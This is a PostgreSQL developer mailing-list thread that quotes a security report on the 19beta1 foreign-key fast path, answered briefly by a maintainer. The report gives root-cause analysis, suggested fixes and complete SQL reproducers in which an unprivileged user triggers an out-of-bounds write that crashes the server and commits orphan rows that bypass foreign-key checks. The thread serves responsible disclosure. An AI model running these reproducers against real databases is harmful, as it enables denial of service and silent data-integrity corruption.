Re: PG19 FK fast path: OOB write and missed FK checks during batched

Amit Langote Sat, 06 Jun 2026 02:13:48 -0700

On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <[email protected]> wrote:


> Hi hackers,
>
>
> The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
> user-defined code in the middle of a deferred batch flush, which yields at
> least three defects reachable by an unprivileged table owner. Present in
> master and verified inREL_19_BETA1.
>
>
> I identified these issues during recent security research with LLMs. While
> they have clear security implications (OOB write, integrity bypass),
> reporting them here because they are isolated to 19beta1, absent in PG18
> and earlier; I don't have patches, only reproducibility.
>
>
> Mechanism:
>
>
> For an INSERT/UPDATE on the referencing side the fast path buffers rows
> in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint
> OID) and probes the PK index in groups, flushing when a
>
> per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the
>
> trigger-firing pass ends (ri_FastPathEndBatch, an
> AfterTriggerBatchCallback). For a cross-type FK the flush calls the
> column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line
> 3069) and the equality operator -- arbitrary user code, mid-flush.  Line
> numbers below are from a REL_19_BETA1 build (commit 4b0bf07).
>
>
> Unprivileged vehicle (defects 1 and 3).  No superuser, no contrib: a role 
> creates
> a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQL
> function, which ri_HashCompareOp wires into the fast path's cast
>
> slot. Below uses a composite type. Default btree opclass, ordinary 
> single-column
> FK, no GUC (fast path is unconditional for non-partitioned, non-temporal
> FKs, per ri_fastpath_is_applicable).
>
>
>
> 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry
>
>
> The write precedes the bound check, and batch_count is reset to 0 only at end
> of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a 
> full-batch
> flush:
>
>
>     fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
>
>     fpentry->batch_count++;
>
>     if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
>
>         ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);
>
>
> There is no re-entrancy guard and ri_FastPathGetEntry returns the same entry,
> so user code that does DML on the same table during a full-batch flush
> re-enters with batch_count == 64 and writes batch[64], one past the
>
> array, overwriting the adjacent batch_count field (struct layout, lines
> 250-251). A single re-entrant row only stomps batch_count, which is then reset
> to 0 before reuse; the crash manifests once the re-entrant insert is
>
> itself large enough to fill and flush a batch, so the stomped batch_count
> is used as an array index (batch[garbage]) and as nvals in memset(matched,
> 0, nvals * sizeof(bool)) (line 3054).
>
>
> Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
> under -O2 the out-of-bounds write is of undefined effect):
>
>
>     create table parent(id int primary key);
>
>     insert into parent select g from generate_series(1,2000) g;
>
>     create type vch as (v int);
>
>     create function vcast(vch) returns int language plpgsql as $$
>
>     begin
>
>       if $1.v = 64 then
>
>         insert into child select row(g)::vch from
> generate_series(1001,1064) g;
>
>       end if;
>
>       return $1.v;
>
>     end$$;
>
>     create cast (vch as int) with function vcast(vch) as implicit;
>
>     create table child(a vch);
>
>     alter table child add constraint child_fkey
>
>       foreign key (a) references parent(id);
>
>     insert into child select row(g)::vch from generate_series(1,64) g;  --
> crash
>
>     -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count
> holding a
>
>     -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
>
>     -- batch_count; backend SIGSEGVs and the cluster restarts.
>
>
>
> 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort
>
>
> On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:
>
>
>     ri_fastpath_cache = NULL;
>
>     ri_fastpath_callback_registered = false;
>
>
> But batch[] holds outstanding rows of the enclosing transaction, not the 
> aborting
> subxact. An internal subxact abort during after-trigger firing (PL/pgSQL
> BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks
> never run and orphans commit behind a constraint that still reports itself
> valid. No cast needed:
>
>
>     create table pk(id int primary key);
>
>     create table fk(a int, tag text);
>
>     insert into pk select g from generate_series(1,10) g;
>
>     alter table fk add constraint fk_a_fkey foreign key (a) references
> pk(id);
>
>     create function abort_subxact() returns trigger language plpgsql as $$
>
>     begin
>
>       if NEW.tag = 'boom' then
>
>         begin perform 1/0; exception when others then null; end;
>
>       end if;
>
>       return NEW;
>
>     end$$;
>
>     create trigger fk_after after insert on fk
>
>       for each row execute function abort_subxact();
>
>     insert into fk values
> (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
>
>     -- INSERT 0 5, no error
>
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>
>     --  a
>
>     -- -----
>
>     -- 999
>
>     --   0   (orphans)
>
>
>     -- the constraint still reports itself valid, and re-validation passes
>
>     -- while the orphans remain:
>
>     select convalidated from pg_constraint where conname = 'fk_a_fkey';
>
>     -- convalidated
>
>     -- --------------
>
>     -- t
>
>     alter table fk validate constraint fk_a_fkey;
>
>     -- ALTER TABLE   (succeeds; does not re-scan committed rows)
>
>     select f.a from fk f left join pk p on f.a=p.id where p.id is null;
>
>     -- 999, 0  (orphans still present)
>
>
> Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY 
> DEFERRED)
> all behave correctly (FK violation raised, no orphans). The whole statement's
> buffered batch is discarded, not just the aborting row's check. The abort
> path also emits "WARNING: resource was not closed" (relation /
>
> index / TupleDesc), a resource leak consistent with the missing flush.
>
>
>
> 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check
>
>
> EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If
> flush-time user code INSERTs into a different fast-path FK table, 
> ri_FastPathGetEntry
> adds a new cache entry mid-scan; it can land in a bucket hash_seq_search
> already passed and is never reached. ri_FastPathTeardown (line 4165) then
> hash_destroys the cache (line 4188) without flushing entries that still
> have batch_count > 0, so that buffered check is discarded. This survives a
>
> per-entry guard for [1] (different entry, not a re-entry of the busy one):
>
>
>     create table parent(id int primary key);
>
>     insert into parent select g from generate_series(1,64) g;
>
>     create table child2(a int);
>
>     alter table child2 add constraint child2_fkey
>
>       foreign key (a) references parent(id);
>
>     create type vch as (v int);
>
>     create function vcast(vch) returns int language plpgsql as $$
>
>     begin
>
>       if $1.v = 1 then
>
>         insert into child2 values (999999);   -- orphan into a
> *different* FK
>
>       end if;
>
>       return $1.v;
>
>     end$$;
>
>     create cast (vch as int) with function vcast(vch) as implicit;
>
>     create table child(a vch);
>
>     alter table child add constraint child_fkey
>
>       foreign key (a) references parent(id);
>
>     insert into child values (row(1)::vch);    -- flushed at
> ri_FastPathEndBatch
>
>     select a from child2 where a not in (select id from parent);  -- =>
> 999999
>
>     -- control: INSERT INTO child2 VALUES (999999); -- correctly raises
> FK error
>
>
>
> Root cause / thoughts:
>
>
> All three stem from invoking user cast/operator code inside a deferred batch
> flush: while a per-entry batch is half-updated [1], while a cache-wide 
> hash_seq_search
> is in progress and teardown drops non-empty entries [3], and against a
> subxact-abort invalidation that cannot tell parent-xact rows from 
> aborted-subxact
> rows [2].
>
>
> - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a 
> "flushing"
> flag to RI_FastPathEntry, rejecting re-entrant modification of a busy
> entry (a nested per-row probe is unsafe: the flush may hold PK-index buffer
> locks).
>
> - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count >
> 0, and/or flush non-empty entries in ri_FastPathTeardown before
> hash_destroy.
>
> - [2] Do not discard outstanding parent-xact rows on
> SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush
> immediate-constraint batches subxact boundaries.
>
> - Unifying: a global "in fast-path flush" guard routing any re-entrant FK 
> check
> to the immediate per-row path, and reconsidering running user code mid-flush
> at all.
>
>
> Nik
>

Thanks for the detailed report and reproducers. I’ve started looking into
this.

- thanks, Amit

>

Re: PG19 FK fast path: OOB write and missed FK checks during batched

Reply via email to